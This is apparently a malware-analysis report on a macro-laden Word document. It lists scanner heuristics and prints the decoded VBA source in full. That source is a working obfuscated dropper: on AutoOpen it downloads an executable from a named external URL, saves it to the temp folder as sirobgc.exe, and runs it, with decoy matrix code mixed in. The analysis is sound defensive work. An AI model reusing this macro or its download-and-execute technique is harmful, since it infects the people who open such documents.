MALICIOUS
270
Risk Score
Heuristics 9
-
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set cpvRO2CMs8 = CreateObject(zknvV5v1T) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName tQ9Qwdby, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84) _ -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.frische-center.com/45/47.exe Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5397 bytes |
SHA-256: 550e597b263ee14fbc44a3904168de41512ab8f2b6574fae0091d4eff4401080 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Nip121ЦКВ3017 (700)
End Sub
Sub Nip121ЦКВ3017(FFFFF As Integer)
OUlemjt4o
End Sub
Attribute VB_Name = "Module1"
' Gaussian Elimination
'
' Parameters:
' A - augmented square matrix, N x N + 1
' x - solution matrix, N x 1
'
' Return value:
' True - if non-singular.
' False - if singular or error.
'
Function GaussianElimination(A() As Single, x() As Single) As Boolean
Dim i, j, k, N, max As Integer
Dim t As Single
On Error GoTo errHandler
N = UBound(A, 1) - LBound(A, 1) + 1
For i = 0 To N - 1
max = i
For j = i + 1 To N - 1
If Abs(A(i, j)) > Abs(A(max, i)) Then
max = j
End If
Next j
If (max <> i) Then
For k = i To N
t = A(max, k)
A(max, k) = A(i, k)
A(i, k) = t
Next k
End If
For j = i + 1 To N - 1
For k = N To i Step -1
A(j, k) = A(j, k) - A(i, k) * A(j, i) / A(i, i)
Next k
Next j
Next i
For i = N - 1 To 0 Step -1
t = 0
For j = i + 1 To N - 1
t = t + A(i, j) * x(j)
Next j
x(i) = (A(i, N) - t) / A(i, i)
Next i
GaussianElimination = True
Exit Function
errHandler: ' Division by zero
GaussianElimination = False
On Error GoTo 0
End Function
Public Function cpvRO2CMs8(zknvV5v1T As String)
Set cpvRO2CMs8 = CreateObject(zknvV5v1T)
End Function
Public Function bFNVp3J2xvb(d9cOd0vwnKMt As Variant, ytGfE7ViuPf8F As String)
Dim KsgMnnqSE7: Set KsgMnnqSE7 = cpvRO2CMs8("A" & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & "m")
With KsgMnnqSE7
.Type = 1
.Open
.write d9cOd0vwnKMt
.savetofile ytGfE7ViuPf8F, 2
End With
End Function
Attribute VB_Name = "Module2"
Private Const N = 100
Public cxEoBxbpZjkM As String
Sub OUlemjt4o()
Jjoibww = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(60) & "/" & Chr(119) & Chr(119) & Chr(119) & "." & Chr(102) & Chr(114) & "i" & Chr(115) & Chr(99) & Chr(104) & Chr(101) & Chr(45) & Chr(99) & Chr(101) & Chr(110) & Chr(116) & Chr(101) & Chr(114) & Chr(46) & "c" & "o" & "m" & Chr(47) & Chr(52) & Chr(53) & Chr(47) & Chr(52) & Chr(55) & Chr(46) & "e" & Chr(120) & Chr(101)
Set tQ9Qwdby = cpvRO2CMs8("M" & Chr(105) & Chr(99) & "r" & "o" & Chr(115) & "o" & Chr(102) & "t" & "." & "X" & Chr(77) & "L" & Chr(72) & Chr(84) & Chr(84) & "P")
Jjoibww = Replace(Jjoibww, Chr(60), "", 1, 1, vbTextCompare)
CallByName tQ9Qwdby, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84) _
, Jjoibww _
, False
Set Oze5NNxtTOM = cpvRO2CMs8(Chr(87) & "S" & "c" & "r" & Chr(105) & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & "e" & Chr(108) & Chr(108))
Set bTVL5zZEy5Xk3 = CallByName(Oze5NNxtTOM, "E" & Chr(110) & Chr(118) & Chr(105) & "r" & "o" & Chr(110) & "m" & "e" & Chr(110) & "t", VbGet, "P" & Chr(114) & "o" & Chr(99) & Chr(101) & Chr(115) & Chr(115))
oKmL1jWBacAVz = bTVL5zZEy5Xk3(Chr(84) & Chr(69) & Chr(77) & Chr(80))
cxEoBxbpZjkM = oKmL1jWBacAVz & Chr(92) & Chr(115) & Chr(105) & Chr(114) & Chr(111) & Chr(98) & Chr(103) & Chr(99) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim JaPwlp2mL() As Byte
CallByName tQ9Qwdby, Chr(83) & "e" & Chr(110) & Chr(100), VbMethod
JaPwlp2mL = CallByName(tQ9Qwdby, Chr(114) & Chr(101) & "s" & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
bFNVp3J2xvb JaPwlp2mL, cxEoBxbpZjkM
On Error GoTo egb760cv
A = 2322 / 0
On Error GoTo 0
CmvHn2MiIV:
Exit Sub
egb760cv:
mgXSela7jWZZ ("LFep9nOQC")
Resume CmvHn2MiIV
End Sub
Sub main()
Dim A(0 To N - 1, 0 To N) As Single
Dim x(N) As Single
Call Populate(A)
Dim i As Integer, j As Integer
Dim v As String
For i = 0 To N - 1
For j = 0 To N
v = v & A(i, j)
If (j <> N) Then v = v & "|"
Next j
v = v & vbCrLf
Next i
Debug.Print "************"
Debug.Print v
Call GaussianElimination(A, x)
v = ""
For i = 0 To N - 1
v = v & x(i)
If (i <> N - 1) Then v = v & "|"
Next i
Debug.Print v
Debug.Print "************"
End Sub
Public Function mgXSela7jWZZ(it7Jnq06zf As String)
Set N9DiXkAk = cpvRO2CMs8("S" & Chr(104) & Chr(101) & Chr(108) & "l" & Chr(46) & "A" & Chr(112) & Chr(112) & "l" & "i" & "c" & "a" & "t" & Chr(105) & Chr(111) & Chr(110))
N9DiXkAk.Open (cxEoBxbpZjkM)
End Function
' Populate matrix
'
' Parameters:
' A - augmented square matrix, N x N + 1
Private Sub Populate(A() As Single)
Dim i, j, N As Integer
Randomize
N = UBound(A, 1)
For i = 0 To N
For j = 0 To N + 1
A(i, j) = Int(1000 * Rnd + 1)
Next j
Next i
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.